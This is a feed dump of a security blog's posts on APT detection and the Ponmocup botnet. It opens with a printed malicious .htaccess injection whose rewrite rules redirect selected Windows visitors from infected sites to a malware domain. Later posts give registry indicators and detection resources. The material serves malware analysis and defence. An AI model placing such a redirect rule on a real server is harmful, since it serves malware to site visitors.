%{REQUEST_METHOD} ^GET$</span><br style="font-family:courier new;"><span style="font-family:courier new;">1519:RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpresstwittweetflickr\.linkedingoogle\.yahoo\.bing\.msn\.ask\.excite\.a</span><br style="font-family:courier new;"><span style="font-family:courier new;">ltavista\.netscape\.aol\.hotbot\.goto\.infoseek\.mamma\.alltheweb\.lycos\.metacrawler\.mail\.dogpile\?).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1521:RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1523:RewriteCond %{HTTP_USER_AGENT} !^.*(bingAccoonaAce\sExplorerAmfibiAmiga\sOSapacheappieAppleSyndication).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1525:RewriteCond %{HTTP_USER_AGENT} !^.*(ArchiveArgusAsk\sJeevesasteriasAtrenko\sNewsBeOSBigBlogZoo).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1527:RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360BlaizBloglinesBlogPulseBlogSearchBlogsLiveBlogsSayblogWatcher).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1529:RewriteCond %{HTTP_USER_AGENT} !^.*(BookmarkbotCE\-PreloadCFNetworkcococCombineCrawlcurlDanger\shiptop).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1531:RewriteCond %{HTTP_USER_AGENT} !^.*(DiagnosticsDTAAgentEmeraldShieldendoEvaalEverest\-Vulcan).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1533:RewriteCond %{HTTP_USER_AGENT} !^.*(exactseekFeedFetchfindlinksFreeBSDFriendsterFuck\sYouGoogle).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1535:RewriteCond %{HTTP_USER_AGENT} !^.*(GregariusHatenaScreenshotheritrixHolyCowDudeHonda\-SearchHP\-UX).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1537:RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPGHttpClienthttpunitichiroiGetteriPhoneIRIXJakartaJetBrains).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1539:RewriteCond %{HTTP_USER_AGENT} !^.*(KrugleLabradorlarbinLeechGetlibwwwLifereaLinkChecker).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1541:RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurfLinuxLiveJournalLonoponoLotus\-NotesLycosLynxMac\_PowerPC).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1543:RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPCMac\s10Mac\sOSmacDNMacintoshMediapartnersMegiteMetaProducts).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1545:RewriteCond %{HTTP_USER_AGENT} !^.*(MivaMobileNetBSDNetNewsWireNetResearchServerNewsAlloyNewsFire).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1547:RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnlineNewsMacProNokiaNuSearchNutchObjectSearchOctora).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1549:RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorerOmnipelagosOnetOpenBSDOpenIntelligenceDataoreilly).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1551:RewriteCond %{HTTP_USER_AGENT} !^.*(os\=MacP900ipanscientperlPlayStationPOE\-ComponentPrivacyFinder).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1553:RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclonePythonretrieverRojoRSSSBIderScooterSeekerSeries\s60).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1555:RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReaderSiteBarSlurpSnoopySoap\sClientSocialmarksSphere\sScout).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1557:RewriteCond %{HTTP_USER_AGENT} !^.*(spidersprooseRamblerStrawsubscriberSunOSSurferSyndic8).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1559:RewriteCond %{HTTP_USER_AGENT} !^.*(SyntryxTargetYourNewsTechnoratiThunderbirdTwicelerurllibValidator).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1561:RewriteCond %{HTTP_USER_AGENT} !^.*(ViennavoyagerW3CWavefirewebcollageWebmasterWebPatrolwgetWin\s9x).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1563:RewriteCond %{HTTP_USER_AGENT} !^.*(Win16Win95Win98Windows\s95Windows\s98Windows\sCEWindows\sNT\s4).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1565:RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTPWinNT4WordPressWWWeaselwwwsteryacyYahoo).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1567:RewriteCond %{HTTP_USER_AGENT} !^.*(YandexYetiYouReadMeZhuaxiaZyBorg).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1569:RewriteCond %{REQUEST_FILENAME} !.*jpg$.*gif$.*png.*jpeg.*mpg.*avi.*zip.*gz.*tar.*ico$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1571:RewriteCond %{HTTP_COOKIE} !^.*ejJ.*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1573:RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1575:RewriteCond %{HTTPS} ^off$</span><br style="font-family:courier new;"><span style="font-family:courier new;">1577:RewriteRule ^(.*)$ http://%{REMOTE_PORT}.<span style="color: rgb(255, 0, 0);">puritanhardrive.com</span>/url?sa=X&source=web&cd=39&ved=0FLFQWdF5&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZItfKzI4Ki3pI2JzVAz9Je1pw==&usg=pyT9z9Cp7DU5572d38ywx9&sig2=bDduChtXGT22SxV5UI2D8H [R=302,L,CO=ejJ:43:%{HTTP_HOST}:10549:/:0:HttpOnly]</span></span><br /><br />As you can see (and mostly mentioned before), the referrer, user-agent and cookie are checked and only if all conditions match the redirection to the malware server is sent back.<br /><br />The malware domain and parameters of the redirection URL (sa, source, cd, ved, url, ei, usg, sig2) are random on each infected webserver, but are constant on each server for every redirect (except for the "url" parameter). Samples are in <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains_2012-03-08.htm">this list</a>.<br /><br />A new discovery is that the subdomain of the redirection domains (starting with "<span style="font-family:courier new;">*.</span>" in the list of domains above) are the source port of the TCP connection and thus should be between 1025 and 65535. So looking for 4-5 digits subdomains could help discover new such redirection domains not yet known or registered.<br /><br />If you find this info useful, spread the word (or link) ;-)<br /><br /><strong><em>Updated on 2012-04-14</em></strong><em><span style="color:#000099;"><br /> <span style="color: rgb(0, 0, 0); font-family:arial;" ></span><span style="color: rgb(0, 0, 0); font-family:arial;" ></span></span></em><br />Lots of A/V seem very ineffective detecting this malware. Check out this analysis from a couple months ago:<br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/ponmocup-analysis_2012-02-18.html">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/ponmocup-analysis_2012-02-18.html</a><br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/analysis_2012-03-07.txt">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/analysis_2012-03-07.txt</a><br /><br />Checking for a couple registry keys should be an easy way to detect infected systems. Here's an IOC that should do this:<br /><a href="http://ioc.forensicartifacts.com/2012/04/ponmocup-2/">http://ioc.forensicartifacts.com/2012/04/ponmocup-2/</a><br /><a href="https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet">https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet</a><br /><br />I would be really interested to hear if you get hits (positive or false) on this IOC. Thanks for any feedback.<br /><em><span style="color:#000099;"><br /></span></em><span style="font-style: italic;"></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com4tag:blogger.com,1999:blog-4767199732858434539.post-87470754130678405612012-02-18T15:35:00.001-08:002012-04-27T15:12:55.600-07:00Not APT, but nasty malware (Ponmocup botnet)<span style="font-family:arial;">For once I don't write about APT, but about some nasty malware / botnet that I've been researching for almost a year. It's been called "Ponmocup botnet", but the malware has been called many different names (Ponmocup, Pirminay, Kryptik, Swisyn, Vundo etc).</span><br style="font-family:arial;"><br style="font-family:arial;"><span style="font-family:arial;">I've been putting most of my research on a privately hosted page here:</span><br style="font-family:arial;"><a style="font-family: arial;" href="http://www9.dyndns-server.com:8080/pub/botnet-links.html">http://www9.dyndns-server.com:8080/pub/botnet-links.html</a><br style="font-family:arial;"><span style="font-family:arial;">(Sorry about the bad formatting and strange URL)</span><br style="font-family:arial;"><br style="font-family:arial;"><span style="font-family:arial;">My very latest "OSINT research" is on the following page:</span><br style="font-family:arial;"><a style="font-family: arial;" href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/ponmocup-analysis_2012-02-18.html">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/ponmocup-analysis_2012-02-18.html</a><br style="font-family:arial;"><span style="font-family:arial;">It shows that you can find many (recent and old) analysis reports just by googling a couple of registry keys or domains. These would also be good indicators to look for (hint).</span>
<br /><br style="font-family:arial;"><span style="font-family:arial;">My biggest questions are:</span><br style="font-family:arial;"><ul><li><pre style="font-family: arial;">Why is this malware known under so many different names?
<br />(Ponmocup, Pirminay, Kryptik, Swisyn, Vundo etc.)</pre></li><li><pre style="font-family: arial;">Why aren't AV companies connecting the dots? </pre></li></ul><span style="font-family:arial;">There is one indicator (registry key) that I believe to be very effective and accurate, but I don't have and hard evidence (besides all these analysis reports) to support this.
<br /></span><blockquote><pre>the existence or creation of a registry key, namely
<br />"HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\
<br />INTERNET SETTINGS\6"
<br />and/or
<br />"HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\
<br />INTERNET SETTINGS\6"</pre><span style="font-family:arial;"></span></blockquote><span style="font-family:arial;">So I would be interested to know if these keys exist on a clean system under any circumstance?
<br />
<br />There has been some cooperation to create IOC's and ET snort rules to detect this malware:</span><br style="font-family:arial;"><a style="font-family: arial;" href="https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet">https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet</a><br style="font-family:arial;"><a style="font-family: arial;" href="http://ioc.forensicartifacts.com/2012/01/ponmocup/">http://ioc.forensicartifacts.com/2012/01/ponmocup/</a><br style="font-family:arial;"><a style="font-family: arial;" href="http://doc.emergingthreats.net/bin/view/Main/WebSearch?search=Ponmocup">http://doc.emergingthreats.net/bin/view/Main/WebSearch?search=Ponmocup</a><br style="font-family:arial;"><br face="arial"><span style="font-family:arial;">A friend of mine (from </span><a style="font-family: arial;" href="http://www.abuse.ch/">abuse.ch blog</a><span style="font-family:arial;"> and </span><a style="font-family: arial;" href="https://zeustracker.abuse.ch/">zeustracker</a><span style="font-family:arial;">) was able to sinkhole some C&C domains for a while to estimate the botnet size and it seemed to be quite big at that time: (April - May 2011)</span><br face="arial"><a style="font-family: arial;" href="http://www.abuse.ch/?p=3294">How Big is Big? Some Botnet Statistics</a><br face="arial"><br face="arial"><span style="font-family:arial;">By the way, I've been </span><a style="font-family: arial;" href="https://twitter.com/BestOf_cAPTure/favorites">tweeting</a><span style="font-family:arial;"> about some general malware threat intel recently, which caught some attention on Digital4rensics blog (thanks Keith!)</span><br face="arial"><a style="font-family: arial;" href="http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing/">http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing/</a><br face="arial"><a style="font-family: arial;" href="http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing-indicators/">http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing-indicators/</a><br face="arial"><br face="arial"><span style="font-family:arial;">How do you share your malware and threat intelligence?</span><br face="arial"><span style="font-family:arial;">Do you know of better ways or platforms to do it?</span><br style="font-family: arial;"><br style="font-family: arial;"><span style="font-family:arial;">Feedback is welcome!</span><br style="font-family: arial;"><br style="font-family: arial;">
<br /><script>document.write('<img src="http://swisstom.ath.cx/c-APT-ure/9.gif?ref='+document.referrer+'" height="1" width="1" />');</script>
<br /><noscript><img src="http://swisstom.ath.cx/c-APT-ure/9.gif" height="1" width="1" /></noscript>
<br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com1tag:blogger.com,1999:blog-4767199732858434539.post-51872316847106145572011-11-19T14:24:00.001-08:002012-04-27T15:23:12.557-07:00Finding Malware and APT activities<div style="text-align: center;"><span style="font-style: italic;font-family:arial;font-size:100%;" >Updates and feedbacks will be posted as comments below (unless I chose otherwise)</span>
<br /></div><span style="font-family:arial;font-size:100%;">
<br />There are two ways to find infected or breached systems that I know of:
<br />First, looking for known (or suspicious) command and control (C&C) traffic on the network. Second, looking for known bad or suspicious indicators on the hosts.
<br />Well, there's actually a third one, combining the two together.
<br />
<br /><span style="font-weight: bold;">Indicators of Compromise</span>
<br />
<br />Mandiant's Indicators of Compromise (IOC) provide a way to describe host and network based indicators of malicious activity or traits.
<br /><a href="http://www.mandiant.com/products/free_software/ioceditor/">IOC Editor</a> is free software to create IOC's. And there's even a free software, <a href="http://www.mandiant.com/products/free_software/iocfinder/">IOC Finder</a>, to check hosts for signs of infection. However, IOC Finder has a limited capability of checking for network based indicators on hosts. The commercial product MIR should have much greater network based capabilities I assume.
<br />For sharing IOCs I found these two sites, <a href="http://openioc.org/">openIOC</a> and Mandiant's <a href="https://forums.mandiant.com/forum/ioc-finder">forums about IOC Finder</a>.
<br />Thanks Mandiant for all your great free software and resources!
<br />
<br /><span style="font-weight: bold;">Network based indicators</span>
<br />
<br />Another solution that looks very promising is <a href="http://www.damballa.com/solutions/damballa_failsafe.php">Damballa's Failsafe</a>, which looks for known bad or suspicious network traffic (DNS, proxy, egress firewall).
<br />There are some <a href="http://www.damballa.com/solutions/demo_load.php">demo videos</a> online available with free registration.
<br />
<br />Something similar seems to be available from <a href="http://trisul.org/">Trisul Networks Analytics</a>. A limited version is available for free. The plugins Badfellas, GeoIP and URLFilter look interesting and promising.
<br />
<br />If you have experience with on of these products or know other similar, I'd be interested to hear about.
<br />
<br />Any network based solution I guess is only as good as the intelligence of known bad or suspicious patterns to look for.
<br />For some IDS based open source solutions, you might find </span><span style="font-family:arial;">Richard Bejtlich's blog post "</span><a style="font-family: arial;" href="http://taosecurity.blogspot.com/2011/01/seven-cool-open-source-projects-for.html">Seven Cool Open Source Projects for Defenders</a><span style="font-family:arial;">" interesting.</span>
<br /><span style="font-family:arial;font-size:100%;">
<br /><span style="font-weight: bold;">Host based indicators</span>
<br />
<br />The host based approach is to look at the memory or disk (binaries, registry, services etc.) for known malware or suspicious patterns. There are certainly many ways to do this besides the already mentioned solutions from Mandiant (and HBGary in a previous post).
<br />Other <a href="http://www.mandiant.com/products/free_software">free tools</a> from Mandiant to check out are Memoryze, Audit Viewer and Redline to inspect memory for malicious or suspicious signs.
<br />
<br />David Hoelzer has some interesting <a href="http://auditcasts.com/screencasts/">screencasts</a> and <a href="http://it-audit.sans.org/blog/">blog posts</a> (inlucding scripts) about finding signs of infections.
<br />
<br /></span><span style="font-family:arial;font-size:100%;"><a href="http://auditcasts.com/screencasts/19-detecting-signs-of-apt-and-malware"># 19 : Detecting Signs of APT and Malware</a>
<br /><a href="http://auditcasts.com/screencasts/18-detecting-apt-and-malware-through-baseline-auditing"># 18 : Detecting APT and Malware through Baseline Auditing</a></span><span style="font-family:arial;font-size:100%;">
<br /><a href="http://it-audit.sans.org/blog/2011/10/17/detecting-malware-apt-like-threats-domain-wide-file-finder" title="Detecting Malware & APT Like Threats - Domain Wide File Finder">Detecting Malware & APT Like Threats - Domain Wide File Finder</a>
<br /></span><span style="font-family:arial;font-size:100%;"><a href="http://it-audit.sans.org/blog/2011/10/11/detecting-apt-and-other-zero-day-malware-through-service-auditing" title="Detecting APT and Other Zero Day Malware through Service Auditing">Detecting APT and Other Zero Day Malware through Service Auditing</a></span><span style="font-family:arial;font-size:100%;">
<br />
<br />There are also some open source projects like <a href="http://mirror.codeplex.com/">MIR-ROR</a>, <a href="http://code.google.com/p/rapier/">Rapier</a> and probably others I haven't looked at. The two mentioned above haven't been active for a while now.
<br />
<br /><span style="font-weight: bold;">Feedback welcome</span>
<br />
<br />If you have corrections, suggestions or other feedback, please contact me (toms.security.stuff at gmail dot com).
<br />
<br />If you found my blog other than from my Twitter profile, feel free to <a href="https://twitter.com/#%21/c_APT_ure/followers">follow</a> me there (<a href="https://twitter.com/c_APT_ure">@c_APT_ure</a>)
<br />
<br /><script>document.write('<img src="http://swisstom.ath.cx/c-APT-ure/8.gif?ref='+document.referrer+'" height="1" width="1" />');</script>
<br /><noscript><img src="http://swisstom.ath.cx/c-APT-ure/8.gif" height="1" width="1" /></noscript>
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com1tag:blogger.com,1999:blog-4767199732858434539.post-76445241685226762011-08-13T15:09:00.001-07:002012-04-27T15:22:07.328-07:00Lots has hAP(T)ened since... Kill those Shady RATs...<span style="font-family:arial;">Well, it's been a long time since my last post and lots has happened since. Where should I start...</span>
<br />
<br /><span style="font-family:arial;">Earlier this year there were details released about </span><a style="font-family: arial;" href="http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf">Operation Night Dragon</a><span style="font-family:arial;">.</span>
<br />
<br /><span style="font-family:arial;">Mandiant released its <a href="http://www.mandiant.com/news_events/forms/m-trends_2011">second M-Trends report</a> ("when prevention fails"), also mentioned on</span><span style="font-family:arial;"> </span><a style="font-family: arial;" href="http://www.businesswire.com/news/home/20110127006206/en/MANDIANT-Releases-M-Trends-Prevention-Fails-U.S.-Department">Businesswire</a><span style="font-family:arial;">. There were also some new, interesting "State of the Hack" and "Fresh Prints of Malware" </span><a style="font-family: arial;" href="http://www.mandiant.com/index.php/news_events/presentation_archives">presentations</a><span style="font-family:arial;">.</span>
<br />
<br /><span style="font-family:arial;">And most recently, there was lots of news about the "</span><a style="font-family: arial;" href="http://www.mcafee.com/us/resources/white-papers/wp-operation-shady-rat.pdf">Operation Shady RAT</a><span style="font-family:arial;">".</span>
<br /><span style="font-family:arial;">Read </span><a style="font-family: arial;" href="http://www.computerworld.com/s/article/9219107/Ira_Winkler_Shady_RAT_case_shows_vendors_as_big_a_problem_as_APT_itself">Ira Winkler's article</a><span style="font-family:arial;"> about it and make your own opinion.</span>
<br /><span style="font-family:arial;">I'd like to cite one paragraph of it:</span>
<br /><blockquote>"This is the root of the problem with how security vendors are dealing with the chronic issue of APT. They treat their customers' misery as their own intellectual property. Companies that investigate APT-related attacks rarely share their findings. They don't exchange information about the most recent malware obfuscation techniques, the best methods to identify compromised systems, the newest malware signatures, etc. Instead, they keep most of the information to themselves and treat it as a competitive advantage. What sharing there is falls far short of what would be required to encourage a robust response capability."</blockquote><span style="font-family:arial;">So what are Indicators of Compromise (IOCs) good for? Well, if they only get used by one security company, they can't reach the full potential.</span>
<br /><span style="font-family:arial;">Or are IOCs widely used and shared and I just don't know about it? Please let me know.</span>
<br />
<br /><span style="font-family:arial;">And then there's yet another interesting paper linked in there, which I've previously found, but haven't fully read yet.</span>
<br /><blockquote>"Far more information about this sort of thing came out in 2009, when The US-China Economic and Security Review Commission released a Northrop Grumman-prepared report called "<a href="http://www.uscc.gov/researchpapers/2009/NorthropGrumman_PRC_Cyber_Paper_FINAL_Approved%20Report_16Oct2009.pdf">Capability of the People's Republic of China to Conduct Cyber Warfare and Computer Network Exploitation</a>"<a target="new" href="http://www.uscc.gov/researchpapers/2009/NorthropGrumman_PRC_Cyber_Paper_FINAL_Approved%20Report_16Oct2009.pdf"></a>. That paper is infinitely more informative than anything that any security company has been willing to disclose."
<br /></blockquote><span style="font-family:arial;">Well, now it's time to read it. (before it gets too outdated)</span>
<br />
<br /><script>document.write('<img src="http://swisstom.ath.cx/c-APT-ure/7.gif?ref='+document.referrer+'" height="1" width="1" />');</script>
<br /><noscript><img src="http://swisstom.ath.cx/c-APT-ure/7.gif" height="1" width="1" /></noscript>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-88771462532681234852010-09-03T13:28:00.001-07:002012-04-27T15:15:02.679-07:00Mandiant's "Indicator of Compromise" (IOC) -- Part 2<span style=";font-family:arial;font-size:100%;" >Well, lots has happened since my last blog post. I'll try to focus on the things about APT and IOC that might interest you.
<br />
<br />Mandiant had some interesting presentations about IOC and released the free tool <a href="http://www.mandiant.com/products/free_software/ioce/">IOCe</a> to create them. There's also a <a href="https://forums.mandiant.com/forum/open-ioc">forum about OpenIOC</a>.
<br /></span><ul style="font-family:arial;"><li style="font-family:arial;"><h3 style="font-weight: normal;"><span style="font-size:100%;"><a href="http://www.mandiant.com/presentations/state_of_the_hack_abcs_of_ioc/">State of the Hack: ABCs of IOC</a> (May 24, 2010)</span></h3></li><li><h3 style="font-weight: normal;"><span style="font-family:arial;font-size:100%;"><a href="http://www.mandiant.com/presentations/fresh_prints_of_mal-ware_0x10x20x3s_of_ioc/">Fresh Prints of Mal-ware: 0x1,0x2,0x3s of IOC</a> (Aug 26, 2010)</span>
<br /></h3></li></ul><span style=";font-family:arial;font-size:100%;" >So there's the long overdue update on IOC.
<br />
<br />Lots of other interesting things to talk about... as soon as I find time to write more :-)
<br />
<br /><script>document.write('<img src="http://swisstom.ath.cx/c-APT-ure/6.gif?ref='+document.referrer+'" height="1" width="1" />');</script>
<br /><noscript><img src="http://swisstom.ath.cx/c-APT-ure/6.gif" height="1" width="1" /></noscript>
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-87195860766814286262010-04-09T15:04:00.001-07:002012-04-27T15:17:56.083-07:00Are all these APT?<span style="font-family:arial;">Would you agree, that all the following are connected to the APT? What else is missing?</span>
<br /><ul style="font-family: arial;"><li>Operation Aurora</li><li><del>Mariposa Botnet</del></li><li>GhostNet</li><li>Shadow network</li></ul><span style="font-family:arial;">Here are some interesting posts, articles and papers supporting this:</span>
<br />
<br /><a style="font-family: arial;" href="http://www.computerworld.com/s/article/9163158/More_than_100_companies_targeted_by_Google_hackers">More than 100 companies targeted by Google hackers</a>
<br /><span style="font-family:arial;">The attack was larger than initially thought</span>
<br />
<br /><span style="font-style: italic;font-family:arial;" >"ISec Partners has published </span><a style="font-weight: bold; font-family: arial; font-style: italic;" href="https://www.isecpartners.com/files/iSEC_Aurora_Response_Recommendations.pdf">technical recommendations</a><span style="font-style: italic;font-family:arial;" > for companies to follow in order to mitigate the Aurora risk."</span>
<br />
<br /><a style="font-family: arial;" href="http://www.computerworld.com/s/article/9169598/Security_industry_faces_attacks_it_cannot_stop">Security industry faces attacks it cannot stop
<br /></a><span style="font-family:arial;">Analysis: Today's security products not much help for advanced persistent threat attacks</span>
<br />
<br /><a style="font-family: arial;" href="http://www.computerworld.com/s/article/9174861/Update_Researchers_track_cyber_espionage_ring_to_China">Update: Researchers track cyber-espionage ring to China</a>
<br /><span style="font-family:arial;">'Shadow' network detailed in report Tuesday by the Information Warfare Monitor</span>
<br /><span style="font-family:arial;">>>> </span><a style="font-family: arial;" href="http://shadows-in-the-cloud.net/">http://shadows-in-the-cloud.net/</a><span style="font-family:arial;"> <<<</span>
<br />
<br /><a style="font-family: arial;" href="http://www.computerworld.com/s/article/9174559/Targeted_cyberattacks_test_enterprise_security_controls">Targeted cyberattacks test enterprise security controls</a>
<br /><span style="font-family:arial;">Instead of prevention, the real focus should be attack mitigation</span>
<br />
<br /><a style="font-family: arial;" href="http://www.computerworld.com/s/article/9174558/After_Google_China_dust_up_cyberwar_emerges_as_a_threat">After Google-China dust-up, cyberwar emerges as a threat</a>
<br /><span style="font-family:arial;">The episode highlighted cyberthreats facing the U.S., but it's not a war -- yet
<br />
<br /><span style="font-weight: bold;">Update 24/04/2010:</span>
<br />
<br />Thanks Richard for the correction in your comment. I think I was mislead by the mention of Mariposa Botnet and APT in the same paragraph on several posts. But when re-reading it again, it does not make a connection between the two (except maybe that the usual security devices failed on both).
<br />
<br /><a href="http://www.cio.com/article/574563/Security_Industry_Faces_Attacks_it_Cannot_Stop">http://www.cio.com/article/574563/Security_Industry_Faces_Attacks_it_Cannot_Stop</a>
<br />
<br /><a href="http://www.blackhatsolutions.com/companynews/update_security_industry_faces_attacks_it_cannot_stop/">http://www.blackhatsolutions.com/companynews/update_security_industry_faces_attacks_it_cannot_stop/</a>
<br />
<br /><span style="font-style: italic;">"The big news at the show had to do with the takedown of the Mariposa botnet -- a massive network of hacked computers that has infectedhalf of the Fortune 100 companies. So-called advanced persistent threat (APT) attacks, such as the one that compromised Google systems in early December, were another hot topic.</span>
<br />
<br /><span style="font-style: italic;">Both Mariposa and the Google attacks illustrate the same thing, however. Despite billions of dollars in security spending, it's still surprisingly hard to keep corporate networks safe."</span>
<br /><script>document.write('<img src="http://swisstom.ath.cx/c-APT-ure/5.gif?ref='+document.referrer+'" height="1" width="1" />');</script>
<br /><noscript><img src="http://swisstom.ath.cx/c-APT-ure/5.gif" height="1" width="1" /></noscript>
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com1tag:blogger.com,1999:blog-4767199732858434539.post-70369325782636383022010-04-09T14:01:00.001-07:002012-04-27T15:16:28.458-07:00Mandiant's "Indicator of Compromise" (IOC)<span style="font-family: arial;font-size:100%;" >There's another interesting approach from Mandiant:
<br />
<br /><a href="http://blog.mandiant.com/archives/766">Combat the APT by Sharing Indicators of Compromise</a> (IOC)
<br />
<br /><span style="font-style: italic;">"At DoD CyberCrime 2010 MANDIANT will formally release this format and tools to leverage it in your investigations today. We’ll have full coverage of the release on M-unition – stay tuned."</span>
<br />
<br />There's also a <a href="http://groups.google.com/group/ioc-malware">Google Group about IOC</a>. But are there any tools available yet, or any IOC's? <br />
<br />I'll update when I find out.
<br /><script>document.write('<img src="http://swisstom.ath.cx/c-APT-ure/4.gif?ref='+document.referrer+'" height="1" width="1" />');</script>
<br /><noscript><img src="http://swisstom.ath.cx/c-APT-ure/4.gif" height="1" width="1" /></noscript>
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-84633273469118307432010-03-28T13:56:00.001-07:002012-04-27T15:19:46.270-07:00Commercial products against APT -- useful or useless?<span style=";font-family:arial;font-size:100%;" >If money is not an issue to your company...
<br />
<br />Here are some commercial products that could help in identification (and possibly remediation) of APT infections:</span>
<br /><ul style="font-family: arial;"><li><a href="http://www.mandiant.com/products/core/intelligent_response/">Mandiant Intelligent Response</a></li><li><a href="https://www.hbgary.com/products-services/responder-pro/">HBGary - Responder Professional</a></li><li>Damballa's <a href="http://www.damballa.com/solutions/index.php">Failsafe Solution</a> and <a href="http://landing.damballa.com/APTAudit.html">APT-Audit</a></li></ul><span style="font-family:arial;">If you have experiences with these products or know other solutions along this line, please <a href="mailto:toms.security.stuff@gmail.tld?subject=replace-tld%21">contact me</a>.</span>
<br />
<br /><span style="font-family:arial;">In this blog I would like to explore how to identify APT infections with freely available tools (like the one's from Mandiant and others) and maybe custom scripts.</span>
<br />
<br /><span style="font-family:arial;">Mandiant's webinar "</span><a style="font-family: arial;" href="http://www.mandiant.com/presentations/fresh_prints_malware_behaving_badly/">Fresh Prints: Malware Behaving Badly</a><span style="font-family:arial;">" covers some details that I would like to dive into. The "<a href="http://blog.mandiant.com/archives/782">Malware Rating Index</a>" (MRI) in the free software Audit Viewer sounds interesting.</span>
<br />
<br /><span style=";font-family:arial;font-size:100%;" >*** Disclaimer: I'm not affiliated with any of the companies linked in this blog ***
<br /><script>document.write('<img src="http://swisstom.ath.cx/c-APT-ure/3.gif?ref='+document.referrer+'" height="1" width="1" />');</script>
<br /><noscript><img src="http://swisstom.ath.cx/c-APT-ure/3.gif" height="1" width="1" /></noscript>
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-7874098036665243282010-03-26T17:12:00.000-07:002011-11-19T13:03:42.196-08:00how do you un-bunch your panties?<span style="font-size:100%;"><span style="font-family:arial;">Here's a funny (in some ways) post on ZDnet from </span><strong style="font-family: arial; font-weight: normal;">Matthew Olney:</strong></span>
<br /><a href="http://blogs.zdnet.com/security/?p=5691"><span style="font-size:100%;">Advanced Persistent Threats: Should your panties be in a bunch, and how do you un-bunch them?</span></a>
<br />
<br /><ol><li value="2">Your APT definition should be: <dt>“APT: There are people smarter than you, they have more resources than you, and they are coming for you. Good luck with that.”</dt></li></ol>
<br /><span style="font-size:100%; font-family:arial;">
<br />Enjoy!
<br /><script>document.write('<img src="http://swisstom.ath.cx/c-APT-ure/2.gif?ref='+document.referrer+'" height="1" width="1" />');</script>
<br /><noscript><img src="http://swisstom.ath.cx/c-APT-ure/2.gif" height="1" width="1" /></noscript>
